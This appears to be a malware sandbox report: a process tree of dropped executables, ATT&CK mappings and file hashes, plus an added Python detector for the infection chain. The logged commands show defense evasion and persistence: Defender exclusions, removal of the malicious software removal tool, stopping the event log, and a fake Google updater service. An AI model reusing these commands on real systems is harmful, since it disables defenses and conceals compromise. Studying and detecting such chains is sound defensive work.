C:\Users\Admin\AppData\Local\Temp\1679313164.exeC:\Users\Admin\AppData\Local\Temp\1679313164.exe6⤵
- Executes dropped EXE
PID:7860
C:\Users\Admin\AppData\Local\Temp\2328932319.exeC:\Users\Admin\AppData\Local\Temp\2328932319.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6192
C:\Windows\winqlsdrvcs.exeC:\Windows\winqlsdrvcs.exe5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:216
C:\Users\Admin\AppData\Local\Temp\2466314816.exeC:\Users\Admin\AppData\Local\Temp\2466314816.exe6⤵
- Executes dropped EXE
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\1202339053.exeC:\Users\Admin\AppData\Local\Temp\1202339053.exe6⤵
- Executes dropped EXE
PID:6728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1346524297.exeC:\Users\Admin\AppData\Local\Temp\1346524297.exe4⤵
- Executes dropped EXE
PID:6208 -
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"5⤵
- Executes dropped EXE
PID:760
-
-
-
C:\Users\Admin\AppData\Local\Temp\2269015714.exeC:\Users\Admin\AppData\Local\Temp\2269015714.exe4⤵
- Executes dropped EXE
PID:6424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\print.exe"C:\Users\Admin\AppData\Local\Temp\a\print.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:7136 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:6104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:2980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:6456
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:7968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:5760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:7588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:6164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:2648
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\222.exe"C:\Users\Admin\AppData\Local\Temp\a\222.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵PID:7316
-
C:\Windows\system32\mode.commode 65,104⤵PID:7616
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p209313910271864811381312692 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_8.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:7756
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5916
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4476
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7628
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7216
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5256
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"4⤵
- Views/modifies file attributes
PID:7580
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6256 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5096
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5300
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵PID:5992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵PID:5160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵PID:8032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵PID:1596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OARKQOLE"5⤵
- Launches sc.exe
PID:3464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"5⤵
- Launches sc.exe
PID:7876
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OARKQOLE"5⤵
- Launches sc.exe
PID:5816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:7432 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"3⤵
- Checks computer location settings
PID:6672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "4⤵PID:7524
-
C:\Windows\system32\reg.exeC:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName5⤵PID:5468
-
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"5⤵PID:2952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\client.exe"C:\Users\Admin\AppData\Local\Temp\a\client.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:8168 -
C:\Windows\system32\Client.exe"C:\Windows\system32\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"2⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\a\64.exe"C:\Users\Admin\AppData\Local\Temp\a\64.exe"2⤵
- Executes dropped EXE
PID:5504 -
C:\Windows\SYSTEM32\cmd.execmd3⤵PID:2820
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4436 -ip 44361⤵PID:2780
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
PID:4544
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵
- Modifies data under HKEY_USERS
PID:3224
-
-
C:\Program Files\Windows Media Player\wmpnetwk.exe"C:\Program Files\Windows Media Player\wmpnetwk.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6412
-
C:\Program Files\Windows Media Player\wmixedwk.exe"C:\Program Files\Windows Media Player\wmixedwk.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5892 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:6880 -
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5488
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1196
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:7936
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7616
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7700
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:6908
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3744
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:4580
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7856
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:1680
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:5996
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:8136
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7576
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3736
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:6728
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:5828
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3968
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:2736
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3624
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:2148
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:1980
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3920
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:1280
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3652
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3380
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:7184 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:6428
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:4064
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4044
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:7648
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:6068
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵PID:5964
-
-
C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exeC:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5776 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5732
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1528
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:6436
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:7672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:7980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:7752
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5704
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:5756
-
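The same service-install sequence appears twice in the tree above (under print.exe, PID 7136, and under Installer.exe, PID 6256): powercfg zeroes the standby and hibernate timeouts, sc.exe registers an auto-start service whose binary lives under C:\ProgramData, sc.exe stops the EventLog service, and in the second instance PowerShell adds Defender exclusions and wusa removes KB890830 (the Malicious Software Removal Tool). Separately, wmixedwk.exe (PID 5892) spawns svchost.exe instances that are not children of services.exe and carry no -k service group. The detection below is an added example, not part of the sandbox report: the records are transcribed from the PIDs and command lines in the tree, while the Proc layout, the function names, the two-indicator threshold and the benign control records at the end of the sample are assumptions of this example.

```python
"""Two detections over a process tree, run on records transcribed from the
tree above. Added example, not part of the sandbox report: the Proc layout,
function names, thresholds and the benign control records are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 = parent outside this excerpt
    cmdline: str


# Indicators, matched case-insensitively anywhere in the command line.
RE_POWERCFG_ZERO = re.compile(
    r"powercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", re.I)
RE_SC_CREATE = re.compile(r'(?<![a-z])sc(?:\.exe)?\s+create\s+"?(?P<name>[^"\s]+)"?'
                          r'\s+binpath=\s*"?(?P<bin>[^"]+?)"?\s+start=\s*"?auto"?', re.I)
RE_SC_STOP_EVENTLOG = re.compile(r"(?<![a-z])sc(?:\.exe)?\s+stop\s+eventlog\b", re.I)
RE_MP_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(?:path|extension|process)\b", re.I)
RE_MSRT_REMOVAL = re.compile(r"wusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b", re.I)  # KB890830 = MSRT


def image_name(cmdline):
    """Lower-cased basename of the executable token (quoted or bare) of a command line."""
    if not cmdline:
        return ""
    first = cmdline[1:].split('"', 1)[0] if cmdline.startswith('"') else cmdline.split(None, 1)[0]
    return first.rsplit("\\", 1)[-1].lower()


def _descendants(children, pid):
    out, stack = [], [pid]
    while stack:
        for child in children.get(stack.pop(), ()):
            out.append(child)
            stack.append(child)
    return out


def find_service_install_chains(procs, min_supporting=2):
    """One finding per parent whose child registers an auto-start service from
    C:\\ProgramData and whose descendants show >= min_supporting other indicators."""
    by_pid = {p.pid: p for p in procs}
    children = defaultdict(list)
    for p in procs:
        children[p.ppid].append(p.pid)
    checks = [(RE_POWERCFG_ZERO, "powercfg_zeroed"), (RE_SC_STOP_EVENTLOG, "eventlog_stopped"),
              (RE_MP_EXCLUSION, "defender_exclusion"), (RE_MSRT_REMOVAL, "msrt_removed")]
    findings = []
    for p in procs:
        m = RE_SC_CREATE.search(p.cmdline)
        if not m or not m.group("bin").lower().startswith("c:\\programdata\\"):
            continue
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        evidence = {key: [] for _, key in checks}
        for d in _descendants(children, parent.pid):
            for rx, key in checks:
                if rx.search(by_pid[d].cmdline):
                    evidence[key].append(d)
        if sum(1 for v in evidence.values() if v) >= min_supporting:
            findings.append({"parent_pid": parent.pid, "parent": image_name(parent.cmdline),
                             "service": m.group("name"), "binpath": m.group("bin"),
                             "evidence": evidence})
    return findings


def find_svchost_anomalies(procs):
    """svchost.exe not started by services.exe, or started without a -k service group."""
    by_pid = {p.pid: p for p in procs}
    out = []
    for p in procs:
        if image_name(p.cmdline) != "svchost.exe":
            continue
        parent = by_pid.get(p.ppid)
        parent_img = image_name(parent.cmdline) if parent else None
        if parent_img != "services.exe" or not re.search(r"\s-k\s", p.cmdline, re.I):
            out.append((p.pid, parent_img))
    return out


# Records transcribed from the tree above (PIDs and command lines are the report's;
# ppid 0 marks a parent not in this excerpt). The last four records are constructed
# benign controls and do not come from the report.
SAMPLE_TREE = [
    Proc(7136, 0, r'"C:\Users\Admin\AppData\Local\Temp\a\print.exe"'),
    Proc(6104, 7136, r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    Proc(7968, 7136, r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    Proc(7588, 7136, r'C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"'),
    Proc(6164, 7136, r"C:\Windows\system32\sc.exe stop eventlog"),
    Proc(6256, 0, r'"Installer.exe"'),
    Proc(1168, 6256, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    Proc(5096, 6256, r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    Proc(5300, 5096, r"wusa /uninstall /kb:890830 /quiet /norestart"),
    Proc(5992, 6256, r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    Proc(7876, 6256, r'C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"'),
    Proc(1456, 6256, r"C:\Windows\system32\sc.exe stop eventlog"),
    Proc(5892, 0, r'"C:\Program Files\Windows Media Player\wmixedwk.exe"'),
    Proc(6880, 5892, r"C:\Windows\system32\svchost.exe"),
    Proc(5488, 6880, r'"C:\Windows\system32\svchost.exe"'),
    Proc(700, 0, r"C:\Windows\system32\services.exe"),                      # constructed control
    Proc(900, 700, r"C:\Windows\system32\svchost.exe -k netsvcs -p"),        # constructed control
    Proc(9001, 0, r"C:\Windows\system32\cmd.exe"),                            # constructed control
    Proc(9002, 9001, r'C:\Windows\system32\sc.exe create VendorAgent binpath= "C:\Program Files\Vendor\agent.exe" start= auto'),  # constructed control
]
```

Attribution goes to the parent of the sc.exe create call rather than to every ancestor, so each chain is reported once; the VendorAgent control is skipped because its binary is under Program Files, and the services.exe-spawned svchost.exe with a -k group is not flagged. The KB890830 check also fires on the cmd.exe wrapper that launches wusa, which is why both PIDs 5096 and 5300 appear in the evidence.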
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1)
- System Services (2): Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3): Windows Service (3)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3): Windows Service (3)
- Scheduled Task/Job (1)
Downloads
- 1.8MB
  MD5:    6a3652d0a357e1c4782f6a6a5d41e7df
  SHA1:   3be7727cc6b713476214b2e78d48b29877f7cec8
  SHA256: b712fa70a550a8da9748eeccee3ec3a453d31cada713ed56fd263a158a583171
  SHA512: 0e11a64fb4d77d056c530871c09fb373dae9131b46ab7ce382ee7f80f49dd4d5a966798f4c4f37c26fa713b24da778035c8fdbadda907156a43dfba55c0e0f0f
- 126KB
  MD5:    6719de6f0c460bde4c3d56e01952e093
  SHA1:   6bc39ada34ab4021afc74120f385ab620e62be88
  SHA256: 1af4abae2b2760280dfa6ceb1dd1e3a2a03c986fb64ef32540811be5d5c90ad7
  SHA512: 12b2f5c172e471f9962641221d8120e0c553d0f591133d1971b8f2096095e8ecf65596c65264575f5dddb74828e5eb3fe32bd66fa6ca12472fbab1e01d8c4920
- 23KB
  MD5:    90b85ffbdeead1be861d59134ea985b0
  SHA1:   55e9859aa7dba87678e7c529b571fdf6b7181339
  SHA256: ed0dc979eed9ab9933c49204d362de575c7112a792633fda75bb5d1dab50a5c2
  SHA512: 8a1c10bbfe5651ab25bf36f4e8f2f65424c8e1004696c8141498b99ea2fbd7b3e5fae4d2cfee6835f7ff46bd2333602f4d8ac4a0f5b8e9757adb176332a3afce
- 36KB
  MD5:    b30d3becc8731792523d599d949e63f5
  SHA1:   19350257e42d7aee17fb3bf139a9d3adb330fad4
  SHA256: b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
  SHA512: 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
- 56KB
  MD5:    752a1f26b18748311b691c7d8fc20633
  SHA1:   c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
  SHA256: 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
  SHA512: a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
- 64KB
  MD5:    2cd00f4dd6659febe12deaf9e6bfbb3a
  SHA1:   7fd06de7ad63cc825484842a220e209a482b1b62
  SHA256: d1201be2c4186813da629165f495d6faf8070587eb348b1bc7b1dc67f0e1bb87
  SHA512: e094eaf171078e5a71c253c995ee74a894a4ef3a39b1f7bd75a6601802c84b3304359760e5d71f9dffe7dc6b98608cbee6a73dd424c61e7f69034f1c2aefbaea
- 2.2MB
  MD5:    8358f1dd3fc6a236434e9eff45f1a2d8
  SHA1:   7a0007ca44015af841015f0775752fede3c167e1
  SHA256: 1f4436584109c2fd0240f92a4d978c6ec021268505515f1e4cf27938db53e849
  SHA512: 477325120bcdc745bab552eef142100d12d6c46679b979773e938d79c528cc4b2de6412ac621a2d8d0773d3d35663e1e0950deb9b4183fcf783fc6273918f7e7
- 1.7MB
  MD5:    3db39aa30df77ddcb2e5b50998a869f4
  SHA1:   fcfaa9cadaf8332aa6eb4c438036ff17a2899cc9
  SHA256: 57387226ddda11faf8909e4edd47ae3d4edac978c035308ba63a5686e580e52a
  SHA512: 596e9833febcdb4c1e84d79258cb305618a252f35d4760be7be695c7abe4ee014b085a7afc33fc6252f0c93affcc8ca405915b8942bd41e736c3a3cf3ab48ea9
- 10KB
  MD5:    47340d40e7f73e62cf09ac60fd16ad68
  SHA1:   effd38f6561155802d3e5090f5714589eae5ce6e
  SHA256: e8a0c46342abd882318dbfdb17b7d3cb93d7138564878a15c5b91229ed81689c
  SHA512: 2d5fbacad67eba3c42c2be95c3bf64d787d15cf96d5afe827d6f9bdb175295859e684202ff5afc773202f4b9d0b3135e913c997bbe72026cd7a7ca96ecf5aa08
- 1.7MB
  MD5:    991b91826af732b41565b2b5083d009c
  SHA1:   d718090336174007e221be35178efbf0a1b58e1e
  SHA256: dc88b67213fbbda17bfa9725bc84fba1f454a9ab74d92d44e3339cb22dcfdb0b
  SHA512: 3b5864f54f856c03f65322dcdfc494d8121b92a4de88953e1449795625645b215897f0cd050dc3560c4d13f5f1c09ad5772e5ab5af507afcb5c74761419a5328
- 14KB
  MD5:    a407c54a89a1dc65074b2f09b8664f34
  SHA1:   b7d984e56575de4fe305e3b2b386f20810e69953
  SHA256: 938d9f85529b66633c6174ebc191774836d5627ca00522934ce67d893f2078f0
  SHA512: 7cad8abee45167e807c2ee399e8ea0287be5686853a20ea929b4ae9a2229bc11623ef3087c58355d124dd2841a5e7afd852fc746041bd5e3b5fe787326509da6
- 872KB
  MD5:    c56b5f0201a3b3de53e561fe76912bfd
  SHA1:   2a4062e10a5de813f5688221dbeb3f3ff33eb417
  SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
- 742KB
  MD5:    544cd51a596619b78e9b54b70088307d
  SHA1:   4769ddd2dbc1dc44b758964ed0bd231b85880b65
  SHA256: dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
  SHA512: f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719
- 14KB
  MD5:    788a402d0fcc43662ba8b73c85c63c7f
  SHA1:   d5cec0d57a7516db6cdecbdc3d335db24444037b
  SHA256: 79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60
  SHA512: 8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e
- 116KB
  MD5:    bad4c7c3c11d8bd6b7f81887cb3cac5f
  SHA1:   80e23c13e67e6af29a2deb31a643148e69887c53
  SHA256: a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4
  SHA512: 27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8
- 12KB
  MD5:    161a5f076af5f6268665ebbcf53a4937
  SHA1:   1cab495c456d4d7dfc936a13b800884af8554704
  SHA256: 62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55
  SHA512: ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35
- 3.4MB
  MD5:    64fb7bebeb2e58cdeef83cc42f624f1b
  SHA1:   242307f03a7d9dc7c76737246d710bf10efe998f
  SHA256: 0965f85212e3c5fc2cd3e14499fd65b90c5aac7029a3d0afd61525284c5dc88f
  SHA512: ec21a3064b68dd87a13e5128cc279ed3ea92c3aa26b245aaf7211ba3cf5bf32c71476b679d0c7a9b94035e18bdb9dea1fe8eb053f7c30d791a026ba4e5398cec
- 60B
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- 6.5MB
  MD5:    0603ce41d19c5ed6f06d28d7c1a0d8fe
  SHA1:   f6851bbba9127c624fb8e9993f747275bfd5e2eb
  SHA256: 63ce5a5c895df81cf05bd0d93f568f5d0f0008bb02c47fa0ce19af76c724cc1d
  SHA512: 2c483c352d4e9eca8f8db546e2a7014477709c320f779b24ae928bc78889ef16c784f96a9686d2d33a393dfb967aceb757dc3b2e39c708357233112d6ce02119
- 7KB
  MD5:    e1517885f6c71f7b3dafa6d4610c4762
